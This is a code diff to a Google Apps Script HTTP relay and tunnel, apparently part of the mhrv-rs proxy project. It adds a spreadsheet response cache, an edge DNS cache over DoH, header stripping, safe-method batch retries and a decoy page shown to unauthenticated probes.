+ * @param {string} url Absolute request URL.
+ * @param {Object} reqHeaders Client request headers (feeds the key).
+ * @return {?Object} { status, headers, body } where `headers` is a JSON
+ *   string and `body` is base64(rawBytes); null on miss, when every
+ *   match is expired, or when the cache sheet is unavailable.
+ */
+function _getFromCache(url, reqHeaders) {
+  var sheet = _initCacheSheet();
+  if (!sheet) return null;
+
+  var hash = _getCacheKey(url, reqHeaders);
+  var matches = sheet.createTextFinder(hash).matchEntireCell(true).findAll();
+  var now = new Date();
+
+  for (var m = 0; m < matches.length; m++) {
+    // Only column A holds keys; a hit elsewhere is a coincidence.
+    if (matches[m].getColumn() !== 1) continue;
+
+    // 8-column read: legacy 7-column rows come back with an empty Z cell,
+    // which is falsy and therefore takes the not-gzipped path below.
+    var row = sheet.getRange(matches[m].getRow(), 1, 1, 8).getValues()[0];
+
+    var expiresAt = row[6];
+    if (expiresAt && expiresAt instanceof Date && expiresAt < now) continue;
+
+    var body = row[4];
+    if (row[7]) {
+      // Stored as base64(gzip(rawBytes)); the relay protocol's `b` field is
+      // base64(rawBytes), so decompress and re-encode for the wire.
+      var gz = Utilities.newBlob(Utilities.base64Decode(body), "application/x-gzip");
+      body = Utilities.base64Encode(Utilities.ungzip(gz).getBytes());
+    }
+
+    return { status: row[2], headers: _refreshCachedHeaders(row[3], row[5]), body: body };
+  }
+  return null;
+}
+
+/**
+ * Fetch a URL and store the response in the spreadsheet cache using a
+ * circular buffer. Storage is skipped on 5xx (a transient outage must
+ * not occupy a slot for the whole TTL), when Cache-Control forbids
+ * caching, or when the stored body would exceed CACHE_MAX_BODY_BYTES.
+ *
+ * Once the upstream fetch has succeeded its result is returned no
+ * matter what happens to the cache write: a spreadsheet error (e.g.
+ * quota or cell-size limits) no longer discards a good response.
+ *
+ * NOTE(review): the fetch sends none of the client's headers even
+ * though reqHeaders feeds the cache key — confirm this is intended.
+ *
+ * @param {string} url Absolute URL to fetch.
+ * @param {?Object} reqHeaders Request headers; used for the key only.
+ * @return {?Object} Live result { status, headers, body } (`headers`
+ *   JSON-encoded, `body` base64), or null when the cache sheet is
+ *   unavailable or the fetch itself threw.
+ */
+function _fetchAndCache(url, reqHeaders) {
+  var sheet = _initCacheSheet();
+  if (!sheet) return null;
+
+  var liveResult = null;
+  try {
+    var response = UrlFetchApp.fetch(url, { muteHttpExceptions: true });
+    var status = response.getResponseCode();
+    var headers = _respHeaders(response);
+    var bodyBytes = response.getContent();
+    var rawB64 = Utilities.base64Encode(bodyBytes);
+    var headersJson = JSON.stringify(headers);
+    liveResult = { status: status, headers: headersJson, body: rawB64 };
+
+    // 5xx never enters the cache. A flapping upstream returning 503 once
+    // would otherwise pin that response until expiry and break the URL
+    // for every subsequent client.
+    if (status >= 500) return liveResult;
+
+    var cacheControl = headers["Cache-Control"] || headers["cache-control"] || null;
+    var ttlSeconds = _parseMaxAge(cacheControl);
+    if (ttlSeconds === 0) return liveResult;
+
+    // Negative caching: cap TTL on persistent 4xx when upstream is silent.
+    // If the origin sent its own Cache-Control for the error response,
+    // that value is honored instead.
+    if (NEGATIVE_CACHE_STATUSES[status] && !cacheControl) {
+      ttlSeconds = NEGATIVE_CACHE_TTL_SECONDS;
+    }
+
+    // Decide whether to gzip-store. Skip when upstream is already encoded
+    // (avoids double-compressing gzip/br/zstd payloads) and when the body
+    // is shorter than GZIP_MIN_BYTES.
+    var contentEncoding = String(
+      headers["Content-Encoding"] || headers["content-encoding"] || ""
+    ).toLowerCase();
+    var alreadyEncoded = contentEncoding && contentEncoding !== "identity";
+    var storedBody = rawB64;
+    var storedZ = 0;
+    if (!alreadyEncoded && bodyBytes.length >= GZIP_MIN_BYTES) {
+      storedBody = Utilities.base64Encode(
+        Utilities.gzip(Utilities.newBlob(bodyBytes)).getBytes()
+      );
+      storedZ = 1;
+    }
+
+    // Cell-size safety gate, applied after compression so a body that
+    // only fits once gzipped is still cached.
+    if (storedBody.length > CACHE_MAX_BODY_BYTES) return liveResult;
+
+    var hash = _getCacheKey(url, reqHeaders);
+    var timestamp = new Date();
+    var expiresAt = new Date(timestamp.getTime() + ttlSeconds * 1000);
+
+    // Safety: fallback if Date math produces invalid result
+    if (isNaN(expiresAt.getTime())) {
+      expiresAt = new Date(timestamp.getTime() + CACHE_DEFAULT_TTL_SECONDS * 1000);
+    }
+    var rowData = [
+      hash, url, status, headersJson, storedBody,
+      timestamp.toISOString(), expiresAt, storedZ,
+    ];
+
+    // Circular buffer write: reuse the slot the cursor points at.
+    var metaSheet = _getMetaSheet();
+    if (metaSheet) {
+      _ensureRowsAllocated(sheet);
+      var writeRow = _getNextCursor(sheet, metaSheet);
+      sheet.getRange(writeRow, 1, 1, 8).setValues([rowData]);
+      _advanceCursor(metaSheet, writeRow);
+    } else {
+      // Fallback: simple append if meta sheet is unavailable
+      sheet.appendRow(rowData);
+    }
+  } catch (e) {
+    // liveResult is still null if the fetch itself failed; otherwise
+    // only the cache write failed and the live response is still good.
+  }
+  return liveResult;
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — DIAGNOSTICS
+// ═══════════════════════════════════════════════════════════
+
+// Log a summary of the cache sheet. Slots blanked by clearExpiredCache()
+// are not counted as entries, and oldest/newest are taken from the
+// Timestamp column because ring-buffer overwrites leave rows unordered.
+function getCacheStats() {
+  var sheet = _initCacheSheet();
+  if (!sheet) {
+    console.log("Cache is not enabled or spreadsheet unavailable.");
+    return;
+  }
+  var data = sheet.getDataRange().getValues();
+  var now = new Date();
+  var totalEntries = 0, expiredCount = 0, oldest = null, newest = null;
+  for (var i = 1; i < data.length; i++) {
+    if (data[i][0] === "") continue;   // blank slot, not an entry
+    totalEntries++;
+    var expiresAt = data[i][6];
+    if (expiresAt instanceof Date && expiresAt < now) expiredCount++;
+    var writtenAt = new Date(data[i][5]).getTime();
+    if (isNaN(writtenAt)) continue;
+    if (oldest === null || writtenAt < oldest) oldest = writtenAt;
+    if (newest === null || writtenAt > newest) newest = writtenAt;
+  }
+  var metaSheet = _getMetaSheet();
+  var cursorInfo = metaSheet
+    ? String(metaSheet.getRange(CACHE_META_CURSOR_CELL).getValue()) : "N/A";
+  console.log("=== CACHE STATS ===");
+  console.log("Total rows used: " + totalEntries + " / " + CACHE_MAX_ROWS);
+  console.log("Active entries: " + (totalEntries - expiredCount));
+  console.log("Expired entries: " + expiredCount);
+  console.log("Cursor position: " + cursorInfo);
+  console.log("Max body size: " + CACHE_MAX_BODY_BYTES + " chars");
+  console.log("Default TTL: " + CACHE_DEFAULT_TTL_SECONDS + " sec");
+  console.log("Vary key headers: " + VARY_KEY_HEADERS.join(", "));
+  if (oldest !== null) {
+    console.log("Oldest entry: " + new Date(oldest).toISOString());
+    console.log("Newest entry: " + new Date(newest).toISOString());
+  }
+}
+
+// Blank every row whose Expires_At is in the past. Rows are cleared in
+// place, not deleted, and all of them go through a single RangeList
+// call instead of one spreadsheet call per expired row.
+function clearExpiredCache() {
+  var sheet = _initCacheSheet();
+  if (!sheet) {
+    console.log("Cache is not enabled.");
+    return;
+  }
+
+  var data = sheet.getDataRange().getValues();
+  var now = new Date();
+  var expiredA1 = [];
+  var live = 0;
+
+  for (var i = 1; i < data.length; i++) {
+    var expiresAt = data[i][6];
+    var expired = expiresAt instanceof Date && expiresAt < now;
+    if (expired) expiredA1.push("A" + (i + 1) + ":H" + (i + 1));
+    else if (data[i][0] !== "") live++;      // skip already-blank slots
+  }
+
+  if (expiredA1.length > 0) sheet.getRangeList(expiredA1).clearContent();
+  console.log("Cleared " + expiredA1.length + " expired entries (" + live + " remaining).");
+}
+
+// Blank every data row (row 1, the header, is kept) and reset the ring
+// cursor to row 2; a sheet that cannot be opened is skipped.
+function clearEntireCache() {
+  var cacheSheet = _initCacheSheet();
+  var dataRows = cacheSheet ? cacheSheet.getDataRange().getNumRows() - 1 : 0;
+  if (dataRows > 0) {
+    cacheSheet.getRange(2, 1, dataRows, 8).clearContent();
+  }
+
+  var cursorSheet = _getMetaSheet();
+  if (cursorSheet) {
+    cursorSheet.getRange(CACHE_META_CURSOR_CELL).setValue(2);
+  }
+
+  console.log("Cache wiped. Cursor reset to row 2.");
+}
diff --git a/assets/apps_script/CodeFull.gs b/assets/apps_script/CodeFull.gs
index 77b2a5e5..c40a7dd8 100644
--- a/assets/apps_script/CodeFull.gs
+++ b/assets/apps_script/CodeFull.gs
@@ -16,18 +16,100 @@ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
 const TUNNEL_SERVER_URL = "https://YOUR_TUNNEL_NODE_URL";
 const TUNNEL_AUTH_KEY = "YOUR_TUNNEL_AUTH_KEY";
 
+// Active-probing defense. When false (production default), bad AUTH_KEY
+// requests get a decoy HTML page that looks like a placeholder Apps
+// Script web app instead of the JSON `{"e":"unauthorized"}` body. This
+// makes the deployment indistinguishable from a forgotten-but-public
+// Apps Script project to active scanners that POST malformed payloads
+// looking for proxy endpoints.
+//
+// Set to `true` during initial setup if a misconfigured client is
+// hitting "unauthorized" and you want the explicit JSON error to debug
+// — then flip back to false before the deployment is widely shared.
+// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.)
+const DIAGNOSTIC_MODE = false;
+
+// Connection-level + IP-leak request headers we strip before forwarding
+// to the destination. UrlFetchApp rejects most of the connection-level
+// names anyway, but we also drop the `X-Forwarded-*` / `Forwarded` /
+// `Via` family so that a misconfigured upstream proxy on the user side
+// can't leak the user's real IP through the relay path. Mirrors
+// upstream `masterking32/MasterHttpRelayVPN@3094288`.
 const SKIP_HEADERS = {
   host: 1, connection: 1, "content-length": 1,
   "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
   "priority": 1, te: 1,
+  "x-forwarded-for": 1, "x-forwarded-host": 1, "x-forwarded-proto": 1,
+  "x-forwarded-port": 1, "x-real-ip": 1, "forwarded": 1, "via": 1,
 };
 
+// Methods we consider safe to replay if `UrlFetchApp.fetchAll()` raises.
+// GET/HEAD/OPTIONS are "safe" (read-only) per RFC 9110 §9.2.1; POST/PUT/
+// PATCH/DELETE can have side-effects, so we surface the error instead of
+// silently re-firing them.
+const SAFE_REPLAY_METHODS = { GET: 1, HEAD: 1, OPTIONS: 1 };
+
+// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style
+// placeholder page — no proxy-shaped JSON, nothing distinctive enough
+// for a probe to fingerprint as a tunnel endpoint.
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+// Bad-auth reply: the JSON error in DIAGNOSTIC_MODE, else the decoy page.
+// NOTE(review): confirm ContentService.MimeType really exposes HTML.
+function _decoyOrError(jsonBody) {
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  return ContentService.createTextOutput(DECOY_HTML).setMimeType(ContentService.MimeType.HTML);
+}
+
+// Edge DNS cache. Plain UDP/53 queries normally traverse the full
+// client → GAS → tunnel-node → public resolver path, and the
+// trans-Atlantic round-trip dominates first-hop latency. When
+// ENABLE_EDGE_DNS_CACHE is true, _doTunnelBatch intercepts udp_open
+// ops with port=53, serves the reply from CacheService on a hit, or
+// does its own DoH lookup on a miss from inside Google's network.
+// Cache hits never reach the tunnel-node.
+//
+// Safety property: any failure (parse error, DoH unreachable,
+// CacheService error, refused qtype) returns null from _edgeDnsTry,
+// and the op falls through to the existing tunnel-node forward path.
+// Set false to disable and forward all DNS through the tunnel as
+// before.
+const ENABLE_EDGE_DNS_CACHE = true;
+
+// DoH endpoints tried in order on cache miss. All speak RFC 8484
+// over GET. Apps Script's outbound network peers well to all three.
+const EDGE_DNS_RESOLVERS = [
+  "https://1.1.1.1/dns-query",
+  "https://dns.google/dns-query",
+  "https://dns.quad9.net/dns-query",
+];
+
+// CacheService bounds: 6h max TTL, 100KB per value, ~1000 keys, 250-char keys.
+const EDGE_DNS_MIN_TTL_S = 30;
+const EDGE_DNS_MAX_TTL_S = 21600;   // 6h CacheService ceiling
+// Used for NXDOMAIN/SERVFAIL and the rare "no answer + no SOA in authority"
+// case. NOERROR/NODATA replies normally carry an SOA, and per RFC 2308 §5
+// we honor that SOA's TTL via _dnsMinTtl (the positive path).
+const EDGE_DNS_NEG_TTL_S = 45;
+const EDGE_DNS_CACHE_PREFIX = "edns:";
+// CacheService rejects keys longer than 250 chars. Names approaching the
+// 253-char DNS limit + prefix + qtype digits can exceed that, so we bail
+// before issuing the get/put. The op falls through to the tunnel-node.
+const EDGE_DNS_MAX_KEY_LEN = 240;
+
+// qtypes we refuse to cache and pass through to the tunnel-node:
+//   255 = ANY (resolvers handle it more correctly than we would)
+const EDGE_DNS_REFUSE_QTYPES = { 255: 1 };
+
 // ========================== Entry point ==========================
 
 function doPost(e) {
   try {
     var req = JSON.parse(e.postData.contents);
-    if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" });
+    if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" });
 
     // Tunnel mode
     if (req.t) return _doTunnel(req);
@@ -38,7 +120,9 @@ function doPost(e) {
     // Single relay mode
     return _doSingle(req);
   } catch (err) {
-    return _json({ e: String(err) });
+    // Parse failures of the request body are also probe-shaped — a real
+    // mhrv-rs client never sends invalid JSON. Decoy for the same reason.
+    return _decoyOrError({ e: String(err) });
   }
 }
 
@@ -96,29 +180,102 @@ function _doTunnel(req) {
     .setMimeType(ContentService.MimeType.JSON);
 }
 
-// Batch tunnel: forward all ops in one request to /tunnel/batch
+// Batch tunnel: forward all ops in one request to /tunnel/batch.
+// When ENABLE_EDGE_DNS_CACHE is true, udp_open/port=53 ops are served
+// locally where possible and only the remainder is forwarded.
 function _doTunnelBatch(req) {
-  var payload = {
-    k: TUNNEL_AUTH_KEY,
-    ops: req.ops || [],
-  };
+  var ops = (req && req.ops) || [];
+
+  // Feature off: byte-identical to the pre-feature behavior.
+  if (!ENABLE_EDGE_DNS_CACHE) {
+    return _doTunnelBatchForward(ops);
+  }
+
+  var results = new Array(ops.length);   // sparse: filled by edge-DNS hits
+  var forwardOps = [];
+  var forwardIdx = [];
+
+  for (var i = 0; i < ops.length; i++) {
+    var op = ops[i];
+    if (op && op.op === "udp_open" && op.port === 53 && op.d) {
+      var synth = _edgeDnsTry(op);
+      if (synth) {
+        results[i] = synth;
+        continue;
+      }
+    }
+    forwardOps.push(op);
+    forwardIdx.push(i);
+  }
+
+  // All ops served locally — no tunnel-node round-trip.
+  if (forwardOps.length === 0) {
+    return _json({ r: results });
+  }
+
+  // Nothing was served locally — forward verbatim, no splice needed.
+  if (forwardOps.length === ops.length) {
+    return _doTunnelBatchForward(ops);
+  }
+
+  // Partial: forward the un-served ops and splice results back in place.
+  var resp = _doTunnelBatchFetch(forwardOps);
+  if (resp.error) return _json({ e: resp.error });
+  if (resp.r.length !== forwardOps.length) {
+    // Tunnel-node version skew — bail explicitly rather than silently
+    // route TCP responses to UDP sids.
+    return _json({ e: "tunnel batch length mismatch" });
+  }
+  return _json({ r: _spliceTunnelResults(forwardIdx, resp.r, results) });
+}
 
+// Verbatim forward: no splice, response passed through unchanged.
+function _doTunnelBatchForward(ops) {
   var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", {
     method: "post",
     contentType: "application/json",
-    payload: JSON.stringify(payload),
+    payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }),
     muteHttpExceptions: true,
     followRedirects: true,
   });
-
   if (resp.getResponseCode() !== 200) {
     return _json({ e: "tunnel batch HTTP " + resp.getResponseCode() });
   }
-
   return ContentService.createTextOutput(resp.getContentText())
     .setMimeType(ContentService.MimeType.JSON);
 }
 
+// Forward + parse for the splice path. Returns { r:[...] } on success or
+// { error: "..." } on any failure: a thrown fetch (message kept generic
+// so the tunnel URL is not echoed back), a non-200 status, or bad JSON.
+function _doTunnelBatchFetch(ops) {
+  var resp;
+  try {
+    resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", {
+      method: "post", contentType: "application/json",
+      payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }),
+      muteHttpExceptions: true, followRedirects: true,
+    });
+  } catch (fetchErr) { return { error: "tunnel batch fetch failed" }; }
+  if (resp.getResponseCode() !== 200) {
+    return { error: "tunnel batch HTTP " + resp.getResponseCode() };
+  }
+  try {
+    var parsed = JSON.parse(resp.getContentText());
+    return { r: (parsed && Array.isArray(parsed.r)) ? parsed.r : [] };
+  } catch (err) { return { error: "tunnel batch parse error" }; }
+}
+
+// Writes forwardedResults[j] into allResults[forwardIdx[j]] for each j
+// and returns allResults (mutated in place) so callers can chain. It
+// calls no GAS services, so it can be tested outside the GAS runtime.
+function _spliceTunnelResults(forwardIdx, forwardedResults, allResults) {
+  var j = 0;
+  while (j < forwardIdx.length) { allResults[forwardIdx[j]] = forwardedResults[j]; j++; }
+
+  return allResults;
+}
+
 // ========================== HTTP relay mode ==========================
 
 function _doSingle(req) {
@@ -136,33 +293,85 @@ function _doSingle(req) {
 
 function _doBatch(items) {
   var fetchArgs = [];
+  var fetchIndex = [];
+  var fetchMethods = [];
   var errorMap = {};
   for (var i = 0; i < items.length; i++) {
     var item = items[i];
+    if (!item || typeof item !== "object") {
+      errorMap[i] = "bad item";
+      continue;
+    }
     if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
       errorMap[i] = "bad url";
       continue;
     }
-    var opts = _buildOpts(item);
-    opts.url = item.u;
-    fetchArgs.push({ _i: i, _o: opts });
+    try {
+      var opts = _buildOpts(item);
+      opts.url = item.u;
+      fetchArgs.push(opts);
+      fetchIndex.push(i);
+      fetchMethods.push(String(item.m || "GET").toUpperCase());
+    } catch (buildErr) {
+      errorMap[i] = String(buildErr);
+    }
   }
+
+  // fetchAll() runs all requests in parallel inside Google. If it
+  // throws as a whole (e.g. one URL violates UrlFetchApp limits and
+  // poisons the whole batch), degrade to per-item fetch so a single
+  // bad request does not zero out the entire batch's responses.
+  // Mirrors upstream `masterking32/MasterHttpRelayVPN@3094288`.
   var responses = [];
   if (fetchArgs.length > 0) {
-    responses = UrlFetchApp.fetchAll(fetchArgs.map(function(x) { return x._o; }));
+    try {
+      responses = UrlFetchApp.fetchAll(fetchArgs);
+    } catch (fetchAllErr) {
+      responses = [];
+      for (var j = 0; j < fetchArgs.length; j++) {
+        try {
+          if (!SAFE_REPLAY_METHODS[fetchMethods[j]]) {
+            errorMap[fetchIndex[j]] =
+              "batch fetchAll failed; unsafe method not replayed";
+            responses[j] = null;
+            continue;
+          }
+          var fallbackReq = fetchArgs[j];
+          var fallbackUrl = fallbackReq.url;
+          var fallbackOpts = {};
+          for (var key in fallbackReq) {
+            if (
+              Object.prototype.hasOwnProperty.call(fallbackReq, key) &&
+              key !== "url"
+            ) {
+              fallbackOpts[key] = fallbackReq[key];
+            }
+          }
+          responses[j] = UrlFetchApp.fetch(fallbackUrl, fallbackOpts);
+        } catch (singleErr) {
+          errorMap[fetchIndex[j]] = String(singleErr);
+          responses[j] = null;
+        }
+      }
+    }
   }
+
   var results = [];
   var rIdx = 0;
   for (var i = 0; i < items.length; i++) {
-    if (errorMap.hasOwnProperty(i)) {
+    if (Object.prototype.hasOwnProperty.call(errorMap, i)) {
       results.push({ e: errorMap[i] });
     } else {
       var resp = responses[rIdx++];
-      results.push({
-        s: resp.getResponseCode(),
-        h: _respHeaders(resp),
-        b: Utilities.base64Encode(resp.getContent()),
-      });
+      if (!resp) {
+        results.push({ e: "fetch failed" });
+      } else {
+        results.push({
+          s: resp.getResponseCode(),
+          h: _respHeaders(resp),
+          b: Utilities.base64Encode(resp.getContent()),
+        });
+      }
     }
   }
   return _json({ q: results });
@@ -203,13 +412,17 @@ function _respHeaders(resp) {
   return resp.getHeaders();
 }
 
+// `doGet` is what active scanners hit first (HTTP GET probes are cheaper
+// than POSTs). We use ContentService here so the response body is the
+// raw HTML we wrote — `HtmlService.createHtmlOutput` would wrap it in
+// a `goog.script.init` sandbox iframe, which the Rust client would then
+// see if it ever GET-followed a redirect back onto /macros/.../exec
+// (decoy/no-json error path). ContentService keeps the doGet response
+// indistinguishable from a forgotten static-HTML web app.
 function doGet(e) {
-  return HtmlService.createHtmlOutput(
-    "<!DOCTYPE html><html><head><title>My App</title></head>" +
-      '<body style="font-family:sans-serif;max-width:600px;margin:40px auto">' +
-      "<h1>Welcome</h1><p>This application is running normally.</p>" +
-      "</body></html>"
-  );
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
 }
 
 function _json(obj) {
@@ -217,3 +430,205 @@ function _json(obj) {
     ContentService.MimeType.JSON
   );
 }
+
+// ========================== Edge DNS helpers ==========================
+
+// Tries to answer one udp_open DNS op at the edge: CacheService first, then
+// each EDGE_DNS_RESOLVERS entry over DoH. `op.d` is the base64 DNS query.
+// Returns a synthesized batch-result {sid, pkts, eof} on success, or null on
+// any failure / unsupported case so the caller can forward to the tunnel-node.
+function _edgeDnsTry(op) {
+  try {
+    var bytes = Utilities.base64Decode(op.d);
+    if (!bytes || bytes.length < 12) return null;   // shorter than a DNS header
+
+    var q = _dnsParseQuestion(bytes);
+    if (!q) return null;
+    if (EDGE_DNS_REFUSE_QTYPES[q.qtype]) return null;   // qtype is never served here
+
+    var key = EDGE_DNS_CACHE_PREFIX + q.qtype + ":" + q.qname;   // qtype + qname only (no qclass)
+    if (key.length > EDGE_DNS_MAX_KEY_LEN) return null;
+    var cache = CacheService.getScriptCache();
+
+    var stored = null;
+    try { stored = cache.get(key); } catch (_) {}   // a failed read is treated as a miss
+    if (stored) {
+      try {
+        var hit = Utilities.base64Decode(stored);
+        if (hit && hit.length >= 12) {
+          // Replay the cached bytes with only the txid rewritten (RFC 1035 §4.1.1).
+          var rewritten = _dnsRewriteTxid(hit, q.txid);
+          return {
+            sid: "edns-cache",
+            pkts: [Utilities.base64Encode(rewritten)],
+            eof: true,
+          };
+        }
+      } catch (_) { /* corrupt cache entry — fall through to DoH */ }
+    }
+
+    for (var i = 0; i < EDGE_DNS_RESOLVERS.length; i++) {
+      var reply = _edgeDnsDoh(EDGE_DNS_RESOLVERS[i], bytes);
+      if (!reply) continue;   // only a null reply moves on to the next resolver
+
+      var rcode = reply[3] & 0x0F;   // RCODE is the low nibble of header byte 3
+      var ttl;
+      if (rcode === 2 || rcode === 3) {   // SERVFAIL / NXDOMAIN
+        ttl = EDGE_DNS_NEG_TTL_S;   // used as-is; the min/max clamp below is skipped
+      } else {
+        var minTtl = _dnsMinTtl(reply);
+        ttl = (minTtl === null) ? EDGE_DNS_NEG_TTL_S : minTtl;
+        if (ttl < EDGE_DNS_MIN_TTL_S) ttl = EDGE_DNS_MIN_TTL_S;
+        if (ttl > EDGE_DNS_MAX_TTL_S) ttl = EDGE_DNS_MAX_TTL_S;
+      }
+
+      try {
+        cache.put(key, Utilities.base64Encode(reply), ttl);
+      } catch (_) {
+        // >100KB value or transient quota — still return the live answer.
+      }
+
+      // The DoH reply should already echo our query's txid; it is rewritten
+      // anyway in case a resolver mangles it.
+      var fixed = _dnsRewriteTxid(reply, q.txid);
+      return {
+        sid: "edns-doh",
+        pkts: [Utilities.base64Encode(fixed)],
+        eof: true,
+      };
+    }
+    return null;   // every resolver failed
+  } catch (err) {
+    return null;   // any unexpected error also means "forward it"
+  }
+}
+
+// Issues one DoH GET to `url`, passing `queryBytes` as unpadded web-safe
+// base64 in `?dns=`. Yields the response bytes, or null on any failure.
+function _edgeDnsDoh(url, queryBytes) {
+  var fetchOpts = {
+    method: "get",
+    muteHttpExceptions: true,
+    followRedirects: true,
+    headers: { accept: "application/dns-message" },
+  };
+  try {
+    var encoded = Utilities.base64EncodeWebSafe(queryBytes).replace(/=+$/, "");
+    var reply = UrlFetchApp.fetch(url + "?dns=" + encoded, fetchOpts);
+    var payload = reply.getResponseCode() === 200 ? reply.getContent() : null;
+    // Anything shorter than the 12-byte DNS header cannot be a usable reply.
+    return (payload && payload.length >= 12) ? payload : null;
+  } catch (fetchErr) {
+    return null;
+  }
+}
+
+// Returns { txid, qname, qtype } for a single-question, class-IN DNS query.
+// qname is lowercased and dot-joined (no trailing dot). Null on malformed/unsupported.
+function _dnsParseQuestion(bytes) {
+  if (bytes.length < 12) return null;
+  var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF);
+  // RFC ambiguity: multi-question queries are essentially unused in
+  // practice and would mis-key the cache (we'd cache a multi-answer reply
+  // under only the first question). Bail and let the tunnel-node handle it.
+  if (qdcount !== 1) return null;
+  var off = 12;
+  var labels = [];
+  var nameLen = 0;
+  while (off < bytes.length) {
+    var len = bytes[off] & 0xFF;
+    if (len === 0) { off++; break; }
+    if ((len & 0xC0) !== 0) return null;   // no compression in questions; also caps len at 63
+    off++;
+    if (off + len > bytes.length) return null;
+    var label = "";
+    for (var i = 0; i < len; i++) {
+      var c = bytes[off + i] & 0xFF;
+      if (c === 0x2E) return null;   // a literal "." would alias another dot-joined qname
+      if (c >= 0x41 && c <= 0x5A) c += 0x20;   // ASCII lowercase
+      label += String.fromCharCode(c);
+    }
+    labels.push(label);
+    off += len;
+    nameLen += len + 1;
+    if (nameLen > 254) return null;   // 255-octet name limit includes the root byte
+  }
+  if (off + 4 > bytes.length) return null;   // also catches a name with no terminator
+  var qtype = ((bytes[off] & 0xFF) << 8) | (bytes[off + 1] & 0xFF);
+  var qclass = ((bytes[off + 2] & 0xFF) << 8) | (bytes[off + 3] & 0xFF);
+  if (qclass !== 1) return null;   // result carries no class, so only IN is accepted
+  return {
+    txid: ((bytes[0] & 0xFF) << 8) | (bytes[1] & 0xFF),
+    qname: labels.join("."),
+    qtype: qtype,
+  };
+}
+
+// Scans the answer + authority sections of a DNS reply and returns the
+// smallest RR TTL, or null if there are no RRs (caller treats null as "use
+// neg TTL"). Also returns null on any malformed input.
+function _dnsMinTtl(bytes) {
+  if (bytes.length < 12) return null;
+  var u16 = function (at) {
+    return ((bytes[at] & 0xFF) << 8) | (bytes[at + 1] & 0xFF);
+  };
+  var questions = u16(4);
+  var records = u16(6) + u16(8);   // ANCOUNT + NSCOUNT
+
+  // Step over each question (name + 4 bytes of QTYPE/QCLASS) to reach the RRs.
+  var pos = 12;
+  for (var qi = 0; qi < questions; qi++) {
+    pos = _dnsSkipName(bytes, pos);
+    if (pos < 0 || pos + 4 > bytes.length) return null;
+    pos += 4;
+  }
+
+  var lowest = null;
+  for (var ri = 0; ri < records; ri++) {
+    pos = _dnsSkipName(bytes, pos);
+    if (pos < 0 || pos + 10 > bytes.length) return null;
+    // After the name: 2B type, 2B class, 4B TTL, 2B rdlength. The top TTL
+    // byte is multiplied (not <<24) so the sum stays in [0, 2^32) rather
+    // than going negative through a signed 32-bit shift.
+    var ttl = (bytes[pos + 4] & 0xFF) * 0x1000000
+            + (((bytes[pos + 5] & 0xFF) << 16) | u16(pos + 6));
+    // RFC 2181: a TTL with the top bit set is treated as 0.
+    if (ttl < 0 || ttl > 0x7FFFFFFF) ttl = 0;
+    if (lowest === null || ttl < lowest) lowest = ttl;
+    var rdlen = u16(pos + 8);
+    pos += 10 + rdlen;
+    if (pos > bytes.length) return null;
+  }
+  return lowest;
+}
+
+// Steps over one wire-format DNS name: labels terminated by the root byte or
+// by a 2-byte compression pointer. Returns the next offset, or -1 if bad.
+function _dnsSkipName(bytes, off) {
+  for (var cursor = off; cursor < bytes.length; ) {
+    var head = bytes[cursor] & 0xFF;
+    var kind = head & 0xC0;   // top two bits select the label type
+    if (head === 0) return cursor + 1;   // root label ends the name
+    if (kind === 0xC0) {
+      // A pointer is two bytes wide and always ends the name in place.
+      return (cursor + 2 > bytes.length) ? -1 : cursor + 2;
+    }
+    if (kind !== 0) return -1;   // 0x40 / 0x80 are reserved label types
+    cursor += 1 + head;   // kind === 0 means head <= 63
+  }
+  return -1;
+}
+
+// Produces a fresh array equal to `bytes` except that elements 0 and 1 hold
+// the big-endian 16-bit `txid`; the input is left untouched. The two id
+// bytes are folded into signed-byte range (-128..127) so the result can be
+// passed to Utilities.base64Encode whether bytes are signed or unsigned.
+function _dnsRewriteTxid(bytes, txid) {
+  var toSigned = function (b) { return b > 127 ? b - 256 : b; };
+  var copy = [];
+  for (var k = 0; k < bytes.length; k++) copy[k] = bytes[k];
+  // Only the two id bytes are replaced; every other byte is copied as-is.
+  copy[0] = toSigned((txid >> 8) & 0xFF);
+  copy[1] = toSigned(txid & 0xFF);
+  return copy;
+}
diff --git a/assets/apps_script/README.md b/assets/apps_script/README.md
index 1cf339a2..6af81d64 100644
--- a/assets/apps_script/README.md
+++ b/assets/apps_script/README.md
@@ -1,13 +1,18 @@
-# Apps Script source (mirrored)
+# Apps Script source
 
-The file `Code.gs` next to this README is a verbatim snapshot of the upstream script you deploy in your own Google Apps Script project:
+Three deploy-ready Apps Script files live here. They all speak the same `{k, m, u, h, b, ct, r}` wire protocol with `mhrv-rs`, so the client just points its `script_id` at whichever deployment you want — no mode change required.
 
-- Upstream: <https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs>
-- Raw link: <https://raw.githubusercontent.com/masterking32/MasterHttpRelayVPN/refs/heads/python_testing/apps_script/Code.gs>
+## Variants and origins
 
-This copy lives in our repo for two reasons:
+- **`Code.gs`** — standard relay. **Verbatim mirror of upstream.** Apps Script does the outbound fetch itself. This is the default choice for most users.
+  - Upstream: <https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs>
+  - Credit: [@masterking32](https://github.com/masterking32). We do not modify this file.
+  - The mirror lives here so that (a) users on networks where `raw.githubusercontent.com` is unreachable can still deploy from a `git clone` / ZIP, and (b) we have a snapshot to diff against if upstream changes silently break the informal relay protocol.
 
